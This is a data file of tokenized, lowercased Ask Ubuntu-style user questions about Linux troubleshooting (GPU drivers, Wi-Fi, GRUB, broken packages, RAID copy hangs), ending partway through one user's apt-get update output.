253490	x server failed to start after using nvidia-xconfig and unable to use my 2nd gpu anyhow	i installed bumbulbee drivers by running the following commands : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia linux-headers-generic and then checked the configuration by running : sudo optirun nvidia-settings -c :8 and checked for all the setting which appeared fine . but then when i rebuilt the xorg.conf file by running : sudo nvidia-xconfig restart lightdm and after that when i restarted the system . x server failed to start resulting in blank screen . when tried starting xserver by pressing ctrl + alt + f1 , startx failed to start ( gives the error ) , so when i removed /etc/x11/xorg.conf the system started off well again but it seems that when ever i try to run counter strike 1.6 by optirun through wine by : env wineprefix= '' /home/ph3n1x/.wine '' optirun wine c : \\ '' program files '' \\ '' counter-strike 1.6 '' \\hl.exe it fails with the error : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 135 ( glx ) minor opcode of failed request : 26 ( x_glxmakecontextcurrent ) serial number of failed request : 254 current serial number in output stream : 254 my lspci shows : 01:00.0 vga compatible controller : nvidia corporation device 1058 ( rev ff ) so i ca n't figure out what exactly is the problem and what can be the solution to it . please any help .
253494	no wireless networks listed ubuntu 12.10	i 'm using ubuntu 12.10 for the first time and i see a lot of questions and answers related to the problem i 'm having . but i hope someone can help me and explain some things in a way a ubuntu-noob can understand it . i 'm not able to connect to any wireless network . i read there 's supposed to be a list in the top right list , but the only options in the menu are : wired network ( greyed out ) disconnected ( greyed out ) vpn connections enable networking ( checked ) connection information ( greyed out ) edit connections ... if i click edit connections and go to the wireless tab , there are still no networks listed . can anybody help me ?
253496	ca n't install xubuntu to asus eee pc 901	i canât install xubuntu from usb . i did not make any changes when i was in usb disc creation section . it says it was 100 % complete . i restart and make changes from bios on boot section . save it . ok . i restart again . nothing . it says press esc to boot ( in 10 seconds ) . i press it , but it goes to windows anyway . usb led light is blinking during restart , so it tries to read it . when i try to install xubuntu from cd it says : this kernal requires an x86-64 cpu , but only detected an i686 cpu . unable to boot â please use a kernel appropriate for your cpu . i used this same installation cd to my other computer fujitsu-siemens amilo 1520 . it does work very well there . my new laptop is : asus eee pc 901 procesor : intel atom n270 thanks !
253497	hp pavilion dv6-6b26sa shutdown thermal overheating	i recently installed ubuntu 12.10 on my laptop . since installing it , i can use it for about 30-45 minutes before it shuts down and on next reboot i get a warning about thermal overheating . i 've tried using the amd/ati prop drivers but that resulted in getting an error about low-graphics mode . i tried to fix this error using an ubuntu guide to reinstall fglrx . this fixed the low-graphics error but did n't fix the overheating . running fglrxinfo says i have no adapter . why is my laptop overheating ? if it is the graphics card , how do i fix it ? i wiped my hdd to make ubuntu my main os as it ran like a dream in vmware and i 'd love to make this my main os .
253498	no windows 7 option in grub	gys i installed ubuntu 12.04 on my desktop which had windows 7 previously . after installing ubuntu their was no option for boot selection and ubuntu 12.04 was getting booted automatically . i used boot repair to fix this problem , but now grub shows only options to boot into ubuntu . here is the log from boot repair : http : //paste.ubuntu.com/1633565/
253499	does selecting `` remove windows '' option during install remove all my windows partitions ?	i had windows 7 installed on my laptop , i installed ubuntu and chosen the option to delete everything . but when i clicked that , it deleted my windows 7 partitions . c : windows e : documents f : important files when doing a full wipe with windows 7 it does not touch any other partitions just the c : drive . now i have all the partitions merged together and i have lost my files . i have some really important files in the partitions that was deleted e : , f : is there anyway i could get them back . i am new to ubuntu and now i am stuck on it till i try and find my files back and change my partition to ntfs so windows can install .
253504	ubuntu for windows 8	to whom it may concern , i want to purchase ubuntu cd , however i have some doubts as to whether the service will be good . my questions are : 1 ) if i purchase it for windows 8 - which one will i need ? 2 ) what happens if i does n't work / customer satisfaction ? 3 ) is this the same a linux ? thank you !
253506	how to 'cd ' to a directory found with 'find ' ?	i have a file in gmai.rb in the below directory : root @ ubuntu : ~ # find / -name gmail.rb|more /media/aruprakshit/fa686de4686da05d/rubyscript/gmail.rb but when i am trying to reach to the rubyscript using cd getting error as : $ cd rubyscript bash : cd : rubyscript : no such file or directory can anyone help me by saying what the bad i did ? : (
253512	custom unity quicklists not working after upgrade to 12.10	in the popular question what custom launchers and unity quicklists are available ? are listed a lot of launchers with custom quicklists for unity , that worked for ubuntu old release , included 12.04 . this is a sample from the first answer : x-ayatana-desktop-shortcuts=videos ; documents [ videos shortcut group ] name=videos exec=nautilus videos targetenvironment=unity [ documents shortcut group ] name=documents exec=nautilus documents targetenvironment=unity why that quicklists are missing after upgrading to ubuntu 12.10 ? this code is no more supported ?
253515	does ubuntu one synchronize extended file attributes ?	ext3 and 4 filesystems , if mounted with that option , support extended file attributes with which you can add metadata to your files : author , acls , and actually whatever you want . does ubuntu one synchronize these attribute along with the file ?
253517	no wireless networks	i recently installed ubuntu side by side with windows 7 . everything works fine except for the fact i ca n't get it to pick up wireless networks around me , have tried multiple things . there are no hard or softblocks on , and linux recognizes my wireless card . any help would be appreciated . i am total linux noob here by the way . computer model is an acer aspire 5733z and my wireless card is an atheros ar9285 .
253519	how can i partition a usb flashdrive in win7	i want to be able to create a ubuntu boot disk using a usb flash drive . i also want to be able to create a second partition for my data on the same drive . how can i create the partition in win7 ? the flash drive is 8gb in size . the idea is to be able to run a self-contained ubuntu from the flash drive with ubuntu opsys on the first partition and any data that i might create to be saved to the second partition .
253520	how can i convert .mp4 and .m4a files to .mp3 files automatically , keeping the cover art ?	i have some .mp4 and .m4a audio files that i want to convert to .mp3 files . i want the resulting .mp3 files to include the cover art included in the source files , without fiddling with easytag manually . how can i do this ?
253525	can not install ubuntu 12.10 ( stuck on black screen with a lot of text )	i have a hp pavilion g7 1303 which has ubuntu 12.04.1 and windows 8 currently installed ( both are x64 ) . i decided to get ubuntu 12.10 ( not upgrade , new install ) . i downloaded the .iso and used the universal usb installer to put it on a usb . then i plug the usb in my computer and start it . i press f6 for more options and select `` nomodeset '' ( i have issues with my gpus - yes i have 2 of them ) . and then some text . a lot of text . the last part of text is something about usb . every line contains the word `` usb '' . ( usb connect , device * ... ) and then there 's just that text and nothing happens . same happens if i select install ubuntu to hard drive . what should i do to make it work ?
253527	install sopcast in 64-bits	i 'm a new user of ubuntu and i 'm finding a lot of difficulties installing sopcat i used the following code : sudo add-apt-repository ppa : ferramroberto/sopcast sudo apt-get update sudo apt-get install sopcast-player after the last command , i had the following answer the following packages have unmet dependencies . sopcast-player : depends : sp-auth ( > = 3.0.1 ) but it is not installable e : unable to correct problems , you have held broken packages . i googled the problem and i found out that i have to install the package sp-auth_3.2.6.1~lffl~natty~ppa_i386.deb on https : //launchpad.net/~ferramroberto/+archive/sopcast/+build/2405344 but when i try to install it appears in my software center `` wrong architechture 'i386 ' `` any suggestions ?
253528	kubuntu 12.04 , kde 4.10 , screen edges selectively working	i 'm running kubuntu 12.04 with kde 4.10 ppa . i have this setup on both my laptop and desktop . on my desktop , everything works fine . i have a 2nd monitor on the right ( nvidia gt440 ) and there 's no issues . on my laptop , i had for a short time an lcd on the right side ( depends what i 'm doing ) . i was messing with the kde settings and i set it so the left and right sides of the screen activated the preview all windows function . both the left and right sides worked fine . fast forward , and now i am not running an additional lcd monitor with the laptop . i 'm just running the laptop itself . i have it configured for the native resolution at 1366x768 . suddenly , my left side screen preview wo n't work . if i set the resolution to 1024x768 , it works fine . meanwhile , top , bottom , and right all work all of the time regardless . it 's almost as if the system is not seeing the actual left edge of the screen . that said , here 's another wrench in the mix . if i put a kde panel on the left side and set it to auto hide , it works fine . meanwhile , the preview all windows feature still does not . i also logged into a terminal at the login screen ( ctrl alt f1 ) and moved .kde to .kde-original , and then logged in to the gui to re-generate a new .kde folder so i was at the stock vanilla setup . and there as well ... did n't work . so it seems as if a new .kde folder wo n't do anything . with all of this troubleshooting that i 've done , i 'm unsure of where i can go from here . what else can i look at ? thanks for any and all insight !
253530	qml module not found	i am getting qml module not found on this line import ubuntu.components 0.1 . i have installed the ubuntu-sdk . i have qt creator 2.6.1 installed . please kindly help or direct me to where i can get help .
253531	icedtea java was blocked because it is out of date	icedtea is not working and whenever i click `` update '' it just takes me to a wiki page about icedtea . i am new to ubuntu and linux in general so this is very frustrating for me . i need to get this fixed to be able to do my chemistry homework online . please help me ! ( i have looked at other questions similar to this but i do not understand their answers . i have even tried some of the suggestions without success ) i have seen many people say that this is a bug but i do not know how to fix bugs or how to implement fixes . please help thank you
253533	reassign f12 wireless switch	i 'm using ubuntu 12.10 along with windows 8 in a new compaq notebook . the f12 key worked well in both systems to switch the wireless connection on/off , but i installed the guake terminal that uses this very same key . so i tried to assign another key to guake , but now i do n't know/find how to recover the f12 key functionality again . in windows works , but not in ubuntu , it must be something easy but i ask for help . ... : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . lxcbr0 no wireless extensions . and in ubuntu i can connect by cable , not appearing any mention to wireless in the applet . additionally , the f12 key seams to activate/deactivate the bluetooth . simply i need the wifi . thanks .
253535	attempting to use belkin n300 wireless usb adapter on ubuntu without a present internet connection	i do n't have internet presently on the laptop through the usb wireless adapter . the installation does not seem to be the problem , since the hardware belkin n300 does work . i can not access the internet via anything but wireless . i am presently using windows looking for answers while trying to use this little device . so any advice will have to take that into account . the different wireless connections are correctly detected . however , if i try to connect to my internet provider , ubuntu tries and keeps failing : wireless network disconnected . you are now offline . that is all it says . there is only one thing following after that : the computer tries to reconnect to the network . what does this stuff mean ? my laptop with ubuntu 12.10 does automatically recognize the hardware , so it is not a driver problem . i know the equipment is not bad , i just do n't know how to make it communicate with my provider . the wifi signal is not weak , as suggested on this webpage . so i suspect `` it managed to establish a connection , but was unable to finalize the connection for some reason and so was disconnected . '' there is no passphrase or login before browsing the web with firefox . with windows , i have to open the browser and give my login and password to the provider through a webpage , but the connection has to be established first . any tips , tricks ? in /lib/firmware/ , there is a folder called rtl8192e . however , according to windows , the driver is called rtl8192cu .
253536	network driver for ubuntu 12.04 installed on dell inspiron 14 r 5420	i am new to ubuntu . i installed ubuntu 12.04 on my dell inspiron 14r 5420 and i am not being able to connect to internet because the network drivers . please help me in finding and installing the drivers .
253537	ubuntu download size	i 'm trying to install ubuntu using windows installer , though its written less than 500mb in the instructions page , the actual installation size is mentioned to be 18gb with 5gb being the minimum , please help me by explaining the difference between two if any and also since i 'm on a limited data plan , any download of more than 1gb will make a big dent on my pocket . please help . check instructions to install here .
253540	dual boot , device for boot loader	question : where to install the boot loader ? i have a system with 2 hds , a 400gb and a 160gb . my ubuntu installation is on my 400gb hd and currently i have windows on my 160gb . i 'd like to install another clean linux distro ( mint ) on my 160gb ( i.e . remove windows ) , but i 'm confused as to where the boot loader goes . obviously i do n't want it to mess up my ubuntu installation . at the installation window i 'm given the following : /dev/sda /dev/sda1 ext4 /dev/sda6 swap /dev/sda5 swap /dev/sdb /dev/sdb1 ntfs my question is , i have several options for boot loader installation . so where should i put it ? currently my system boots up and grub loads and gives me to option to choose between ubuntu ( default ) and optional windows . my choices are /dev/sda ata st ... . ( 400.1gb ) /dev/sda1 ubuntu /dev/sdb ata wdc ... . ( 160.0gb ) /dev/sdb1 windows 7 ( loader ) what is the difference anyways ? could anyone link where this is explained or explain it ? thank you all ! edit to be specific , i wanted windows completely gone . just two linux distros on separate hds .
253543	diagnose complete hang of ubuntu 12.04.1 server when starting an i/o intense operation ?	at the moment i am trying to migrate data from a software raid5 ( 6 disks ) over to a software raid1 . the command of choice was : rsync -avxhacpx /mnt/old/ /mnt/new/ however , after the first few files the machine locks up completely . first i thought that this was because the disks were connected using a usb3 extension card , but even when directly connecting them using sata the situation wo n't change . at the moment i am running a long smart test using smartctl , but that will take a long time to finish . and in the meantime i 'd like to find out how to diagnose such an issue . several years ago one used to be able to follow the kernel log on one of the terminals , but it seems ubuntu does n't provide that anymore . since the log files do n't contain anything useful whatsoever ( likely because they do n't get written once the error condition occurs ) i 'm left wondering how to diagnose such an issue ? my question is also more of a general question about diagnosing such an issue when i come across it . right now the only chance i seem to have is to note down the files that contain errors and then skip those when copying . but that 's the actual task . on a more abstract level i 'd like to learn about strategies like what i could do in the past by watching the kernel console . nb : i prefixed my invocation of rsync with ionice -c 3 nice first , but then after this gave the error , removed it . the error occurs independent of this . further information : source volume is xfs , target disk is ext4 . i am always mount -o ro , remounting the source volume before starting the copy operation . the source volume also happens to be an lvm2 volume layered on top of the software raid5 ( md ) . smartctl -a output ( filtered ) : # for i in $ ( blkid |grep '/sd'|cut -b 1-8|sort|uniq ) ; do echo $ i ; smartctl -a $ i|grep -a 1 '^smart error log version ' ; done /dev/sda smart error log version : 1 no errors logged /dev/sdb smart error log version : 1 ata error count : 1 /dev/sdc smart error log version : 1 no errors logged /dev/sdd smart error log version : 1 no errors logged /dev/sde smart error log version : 1 no errors logged /dev/sdf smart error log version : 1 no errors logged /dev/sdg smart error log version : 1 no errors logged /dev/sdh smart error log version : 1 no errors logged /dev/sdb is one of the physical disks that comprise the source volume 's physical volume . the iostat output you asked for : sdc 0.00 3.50 0.00 2.00 0.00 22.00 22.00 0.45 226.00 0.00 226.00 78.00 15.60 sdd 38.50 0.00 86.00 0.00 6982.00 0.00 162.37 0.27 3.14 3.14 0.00 2.95 25.40 sde 39.50 0.00 88.00 0.00 7064.00 0.00 160.55 0.43 4.95 4.95 0.00 4.30 37.80 md1 0.00 0.00 625.00 0.00 34984.00 0.00 111.95 0.00 0.00 0.00 0.00 0.00 0.00 sdf 40.00 0.00 84.50 0.00 6994.00 0.00 165.54 0.40 4.73 4.73 0.00 4.43 37.40 sdg 0.00 107.00 0.00 250.00 0.00 18018.00 144.14 1.29 5.06 0.00 5.06 0.61 15.20 sdh 0.00 107.00 251.00 6.50 16034.00 2434.00 143.44 2.54 9.69 9.74 7.69 0.60 15.40 md6 0.00 0.00 0.50 113.50 2.00 2434.00 42.74 0.00 0.00 0.00 0.00 0.00 0.00 md5 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 bigdisk 0.00 0.00 625.00 0.00 34984.00 0.00 111.95 2.59 4.19 4.19 0.00 0.92 57.80 device : rrqm/s wrqm/s r/s w/s rkb/s wkb/s avgrq-sz avgqu-sz await r_await w_await svctm % util sda 38.50 0.00 86.50 0.00 6982.00 0.00 161.43 0.40 4.58 4.58 0.00 4.09 35.40 sdb 39.00 0.00 87.00 0.00 6898.00 0.00 158.57 0.38 4.37 4.37 0.00 3.91 34.00 sdc 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sdd 40.50 0.00 86.00 0.00 7028.00 0.00 163.44 0.30 3.51 3.51 0.00 3.16 27.20 sde 37.50 0.00 86.50 0.00 6972.00 0.00 161.20 0.39 4.51 4.51 0.00 4.05 35.00 md1 0.00 0.00 626.50 0.00 34772.00 0.00 111.00 0.00 0.00 0.00 0.00 0.00 0.00 sdf 38.50 0.00 86.50 0.00 7002.00 0.00 161.90 0.42 4.86 4.86 0.00 4.23 36.60 sdg 0.00 470.00 0.00 277.50 0.00 80506.00 580.22 68.39 246.57 0.00 246.57 2.54 70.40 sdh 0.00 459.50 128.50 152.00 8224.00 71834.00 570.82 72.01 256.88 6.66 468.42 2.52 70.80 md6 0.00 0.00 0.00 612.50 0.00 71834.00 234.56 0.00 0.00 0.00 0.00 0.00 0.00 md5 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 bigdisk 0.00 0.00 626.50 0.00 34772.00 0.00 111.00 2.69 4.30 4.30 0.00 0.93 58.20 /dev/sdb is the device smartctl reports with errors .
253546	how to update to kernel 3.8 rc7 ubuntu 12.10	how do i update my kernel to 3.8 rc7 on ubuntu 12.10 ? i need step by step instructions . i did a google search but only found instructions on rc5 and below .
253547	screen totally freezes in few minutes after upgrade to ubuntu server 12.10	also spikes in cp usage . i am sure it is not a memory issue since i have over 100gb for the ubuntu os . it was also giving me errors regarding my graphics card which i managed to correct ( i think ) before this started happening . . i 've been trying to learn as much and as fast as i can but i am still a newbie and not as computer savvy as i would like to be as of yet . so i do not even know what tests to run to have information to give for someone to provide me an answer to this problem . below is at least information about my server which i hope will be of some use to anyone who could help out or point me to a link with possible answers . thanking you in advance . had to uncomment most of results so they would not be enlarged and emboldened . results of sudo ( and gksudo ) gedit /etc/default/grub if you change this file , run 'update-grub ' afterwards to update /boot/grub/grub.cfg . for full documentation of the options in this file , see : info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_**quiet**=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian' grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' '' uncomment to enable badram filtering , modify to suit your needs this works with linux ( no patch required ) and with any kernel that obtains the memory map information from grub ( gnu mach , kernel of freebsd ... ) grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' uncomment to disable graphical terminal ( grub-pc only ) grub_terminal=console the resolution used on graphical terminal note that you can use only modes which your graphic card supports via vbe you can see them in real grub with the command `vbeinfo' grub_gfxmode=640x480 uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux grub_disable_linux_uuid=true uncomment to disable generation of recovery mode menu entriesgrub_disable_recovery= '' true '' uncomment to get a beep at grub start grub_init_tune= '' 480 440 1 '' _ also based on another link which said i should add in the i915 and intel_agp drivers ( which i do n't yet know how to add drivers that way and then save , and rebuild by running update-initramfs -u ) i ran the command sudo gedit /etc/initramfs-tools/modules with these results : list of modules that you want to include in your initramfs.they will be loaded at boot time in the order below . syntax : module_name [ args ... ] you must run update-initramfs ( 8 ) to effect this change . examples : raid1 sd_mod _ found these two links . this one here ! specific to ubuntu and the type of cpu ( intel ) i have . and this link here ! which i have quoted one of the answers from just below . im working through similar issues with my x230 , but more focussed on getting external screens running . i had to use the nomodeset flag to get installed . here is what i have so far : display port on x230 not working my steps so far to get closer to working : do n't use `nomodeset` or `modeset=0` , as it throws off kms and you wont be able to do anything . `sudo vi /etc/initramfs-tools/modules` and add in the i915 and intel_agp drivers , save , and rebuild by running `update-initramfs -u` . i 've also made a custom x config stub in /usr/share/x11/xorg.conf.d/ to load the intel driver and give it some specifications , and a monitor config for all my devices . however , i still cant get my second monitor running ! also - ive used arandr to create a shell script that sets all my resolutions nicely , except it too wont cause my displayport-connected monitor to function ... hope that helps . new information from zen : it uses from 1/2 to 3/4 of cpu usage when first starting out and then continues to use around 1/2 of the cpu when virtually nothing is being run . and absolutely refuses to shut down the vast majority of the time even when trying to get a terminal by pressing alt ctl del or alt ctl del and then ctl atl backspace . everything just freezes up . will now try what you have suggested , jwpat7 . tom @ ubuntu12 : ~ $ lspci -vk | grep -ia10 vga 01:00.1 vga compatible controller : matrox electronics systems ltd. mga g200eh ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 330e flags : bus master , fast devsel , latency 0 , irq 11 memory at f9000000 ( 32-bit , prefetchable ) [ size=16m ] memory at fbde0000 ( 32-bit , non-prefetchable ) [ size=16k ] memory at fb000000 ( 32-bit , non-prefetchable ) [ size=8m ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > 01:00.2 system peripheral : hewlett-packard company integrated lights-out standard management processor support and messaging ( rev 05 ) subsystem : hewlett-packard company ilo3 tom @ ubuntu12 : ~ $ sudo lshw -c processor [ sudo ] password for tom : *-cpu description : cpu product : intel ( r ) xeon ( r ) cpu e31220 @ 3.10ghz vendor : intel corp. physical id : 400 bus info : cpu @ 0 version : intel ( r ) xeon ( r ) cpu e31220 @ 3.10ghz slot : proc 1 size : 3100mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx lahf_lm ida arat xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid configuration : cores=4 enabledcores=4 threads=4 tom @ ubuntu12 : ~ $ free -m df -h total used free shared buffers cached mem : 1.9g 1.8g 73m 0b 76m 535m -/+ buffers/cache : 1.2g 686m swap : 2.2g 10m 2.1g main computer brand - hp series - proliant ml110 g7 model - 626474r-001 type - tower processor - intel xeon e3-1220 3.1ghz 4c/4t ( 8 mb cache 80w ) memory - 2gb ddr3 ( max 16 gb / 4 dimm slots / unbuffered ecc ) hard drive - 1 x 250gb non-hot-plug lff sata storage controller - hp embedded smart array b110i sata raid controller raid level - raid 0/1/10 max hdd capacity - up to 8.0tb ( 4 x 2.0tb ) non-hot plug lff sata media drives - hp half-height 16x sata dvd-rom networking - hp nc112i 1-port ethernet server adapter ( x2 ) expansion slots - 4 power - ( 1 ) 350 watt non-hot plug , non-redundant features fans : one ( 1 ) - non-redundant system fan ships standard one ( 1 ) - non-redundant pcie fan ships standard one ( 1 ) - non-redundant cpu heatsink fan ships standard management : hp integrated lights-out standard ( ilo 3 )
253552	erasing/formating/deleting a usb flash drive	i loaded ubuntu on to flashdrive . now i want to remove it but when i try it returns drive write protected . i have tried sudo dd if=/dev/zero of=/devsdb bs=512 count=1 , but that returns read only file system . i have tried many different usb format programs and all say the same . it does not have a switch on it ! it is a 32gb coremicro usb flash drive . how do i remove ubuntu from this usb drive ?
253560	grub messed up after plugging in external hard drive	i connected an external hard drive in which i have a dual boot of win 7 and ubuntu on my ubuntu laptop to transfer some files . now when i boot my laptop , it shows grub with the partitions from the external hard drive even though the latter is not connected to the computer . obviously if i try to load some of the partitions from the external disk it fails . how can i repair my mbr ?
253565	how can i change the default location of sidebar content folders to folders in partition shared by win7 & ubuntu	i have a partition named storage which is used by both windows 7 and ubuntu 12.04 where i have my music , videos , pictures and downloads . i 'd like to have the sidebar icons with these same names ( eg . music , pictures , etc . ) on ubuntu link to the folders in storage with the same name rather than home/music etc . the problem is that i am super new to ubuntu , i 've been researching and i think it has to do with editing ~/.config/user-dir.dirs but i have no idea how to navigate to this location , much less how to edit the file .
253570	disk image mounter : value too large for define data type	i have a genuine iso file of autocad ~2.5gb , i can mount it in windows with traditional application like poweriso & alcohol but while in nautilus the error mentioned in title occurs . now how can i eliminate this error ? and , or how do i extract iso to its contents at-least winrar can treat iso as an archive ... .
253572	how to grant access to raw partition for lxc container	i 'm using the linux containers as set by default in the package lxc . i 'd like to give one of the container an exclusive access to one partition . does anybody know , how to configure it ? i 'd like to be able to setup cryptsetup luks inside it , with btrfs file system . than i 'd like to be able to open it and mount it inside the container , so i would n't need to login into the host itself .
253575	i get several `` broken file '' errors when creating my boot stick	while creating my boot stick i get 199 separate errors during the iso extracting process that all say data error in ( insert file name here ) file is broken then it sticks on 99 % of the iso extraction and only offers me an option to close the installer . what have i done wrong ?
253588	e : unable to correct problems , you have held broken packages . ?	i honestly am clueless . i am trying to install gnuradio . when i go to install the pre requisites , using sudo apt-get install cmake swig libcppunit-dev python-cheetah doxygen \ libboost-all-dev python-sphinx fftw3-dev python-numpy libqwt-dev \ libusb++-dev libusb-dev libusb-1.0-0-dev libgsl0-dev python-wxgtk2.6 \ qtcreator . this is what i get back from the terminal : richard @ richard-satellite-c650 : ~/sdr $ sudo apt-get install cmake swig libcppunit-dev python-cheetah doxygen \ > libboost-all-dev python-sphinx fftw3-dev python-numpy libqwt-dev \ > libusb++-dev libusb-dev libusb-1.0-0-dev libgsl0-dev python-wxgtk2.6 \ > qtcreator reading package lists ... done building dependency tree reading state information ... done note , selecting 'libfftw3-dev ' instead of 'fftw3-dev' doxygen is already the newest version . libcppunit-dev is already the newest version . libfftw3-dev is already the newest version . libgsl0-dev is already the newest version . libusb-1.0-0-dev is already the newest version . libusb-dev is already the newest version . python-cheetah is already the newest version . python-numpy is already the newest version . swig is already the newest version . cmake is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : libboost-all-dev : depends : libboost-dev but it is not going to be installed depends : libboost-date-time-dev but it is not going to be installed depends : libboost-filesystem-dev but it is not going to be installed depends : libboost-graph-dev but it is not going to be installed depends : libboost-graph-parallel-dev but it is not going to be installed depends : libboost-iostreams-dev but it is not going to be installed depends : libboost-math-dev but it is not going to be installed depends : libboost-mpi-dev but it is not going to be installed depends : libboost-mpi-python-dev but it is not going to be installed depends : libboost-program-options-dev but it is not going to be installed depends : libboost-python-dev but it is not going to be installed depends : libboost-regex-dev but it is not going to be installed depends : libboost-serialization-dev but it is not going to be installed depends : libboost-signals-dev but it is not going to be installed depends : libboost-system-dev but it is not going to be installed depends : libboost-test-dev but it is not going to be installed depends : libboost-thread-dev but it is not going to be installed depends : libboost-wave-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . richard @ richard-satellite-c650 : ~/sdr $ if anyone could help he with this , that would be much appreciated . thanks , richard as you requested . richard @ richard-satellite-c650 : ~ $ sudo apt-get update ign extras.ubuntu.com precise inrelease ign security.ubuntu.com precise-security inrelease ign archive.canonical.com precise inrelease ign ca.archive.ubuntu.com precise inrelease ign ca.archive.ubuntu.com precise-updates inrelease ign ca.archive.ubuntu.com precise-backports inrelease hit extras.ubuntu.com precise release.gpg get:1 security.ubuntu.com precise-security release.gpg [ 198 b ] hit archive.canonical.com precise release.gpg hit ca.archive.ubuntu.com precise release.gpg hit extras.ubuntu.com precise release get:2 security.ubuntu.com precise-security release [ 49.6 kb ] hit archive.canonical.com precise release get:3 ca.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit ca.archive.ubuntu.com precise-backports release.gpg hit extras.ubuntu.com precise/main sources hit archive.canonical.com precise/partner i386 packages hit ca.archive.ubuntu.com precise release hit extras.ubuntu.com precise/main i386 packages ign extras.ubuntu.com precise/main translationindex ign archive.canonical.com precise/partner translationindex get:4 security.ubuntu.com precise-security/main sources [ 63.1 kb ] get:5 ca.archive.ubuntu.com precise-updates release [ 49.6 kb ] hit ca.archive.ubuntu.com precise-backports release get:6 security.ubuntu.com precise-security/restricted sources [ 1,950 b ] get:7 security.ubuntu.com precise-security/universe sources [ 20.9 kb ] get:8 security.ubuntu.com precise-security/multiverse sources [ 1,380 b ] get:9 security.ubuntu.com precise-security/main i386 packages [ 233 kb ] hit ca.archive.ubuntu.com precise/main sources hit ca.archive.ubuntu.com precise/restricted sources hit ca.archive.ubuntu.com precise/universe sources hit ca.archive.ubuntu.com precise/multiverse sources hit ca.archive.ubuntu.com precise/main i386 packages hit ca.archive.ubuntu.com precise/restricted i386 packages hit ca.archive.ubuntu.com precise/universe i386 packages hit ca.archive.ubuntu.com precise/multiverse i386 packages hit ca.archive.ubuntu.com precise/main translationindex hit ca.archive.ubuntu.com precise/multiverse translationindex hit ca.archive.ubuntu.com precise/restricted translationindex hit ca.archive.ubuntu.com precise/universe translationindex get:10 ca.archive.ubuntu.com precise-updates/main sources [ 366 kb ] get:11 security.ubuntu.com precise-security/restricted i386 packages [ 3,968 b ] get:12 security.ubuntu.com precise-security/universe i386 packages [ 67.1 kb ] get:13 security.ubuntu.com precise-security/multiverse i386 packages [ 2,371 b ] hit security.ubuntu.com precise-security/main translationindex hit security.ubuntu.com precise-security/multiverse translationindex hit security.ubuntu.com precise-security/restricted translationindex hit security.ubuntu.com precise-security/universe translationindex hit security.ubuntu.com precise-security/main translation-en hit security.ubuntu.com precise-security/multiverse translation-en hit security.ubuntu.com precise-security/restricted translation-en ign extras.ubuntu.com precise/main translation-en_ca ign archive.canonical.com precise/partner translation-en_ca hit security.ubuntu.com precise-security/universe translation-en get:14 ca.archive.ubuntu.com precise-updates/restricted sources [ 5,135 b ] get:15 ca.archive.ubuntu.com precise-updates/universe sources [ 78.6 kb ] get:16 ca.archive.ubuntu.com precise-updates/multiverse sources [ 4,726 b ] get:17 ca.archive.ubuntu.com precise-updates/main i386 packages [ 583 kb ] ign archive.canonical.com precise/partner translation-en ign extras.ubuntu.com precise/main translation-en get:18 ca.archive.ubuntu.com precise-updates/restricted i386 packages [ 9,503 b ] get:19 ca.archive.ubuntu.com precise-updates/universe i386 packages [ 181 kb ] get:20 ca.archive.ubuntu.com precise-updates/multiverse i386 packages [ 10.4 kb ] hit ca.archive.ubuntu.com precise-updates/main translationindex hit ca.archive.ubuntu.com precise-updates/multiverse translationindex hit ca.archive.ubuntu.com precise-updates/restricted translationindex hit ca.archive.ubuntu.com precise-updates/universe translationindex hit ca.archive.ubuntu.com precise-backports/main sources hit ca.archive.ubuntu.com precise-backports/restricted sources hit ca.archive.ubuntu.com precise-backports/universe sources hit ca.archive.ubuntu.com precise-backports/multiverse sources hit ca.archive.ubuntu.com precise-backports/main i386 packages hit ca.archive.ubuntu.com precise-backports/restricted i386 packages hit ca.archive.ubuntu.com precise-backports/universe i386 packages hit ca.archive.ubuntu.com precise-backports/multiverse i386 packages hit ca.archive.ubuntu.com precise-backports/main translationindex hit ca.archive.ubuntu.com precise-backports/multiverse translationindex hit ca.archive.ubuntu.com precise-backports/restricted translationindex hit ca.archive.ubuntu.com precise-backports/universe translationindex hit ca.archive.ubuntu.com precise/main translation-en_ca hit ca.archive.ubuntu.com precise/main translation-en hit ca.archive.ubuntu.com precise/multiverse translation-en hit ca.archive.ubuntu.com precise/restricted translation-en hit ca.archive.ubuntu.com precise/universe translation-en_ca hit ca.archive.ubuntu.com precise/universe translation-en hit ca.archive.ubuntu.com precise-updates/main translation-en_ca hit ca.archive.ubuntu.com precise-updates/main translation-en hit ca.archive.ubuntu.com precise-updates/multiverse translation-en hit ca.archive.ubuntu.com precise-updates/restricted translation-en hit ca.archive.ubuntu.com precise-updates/universe translation-en_ca hit ca.archive.ubuntu.com precise-updates/universe translation-en hit ca.archive.ubuntu.com 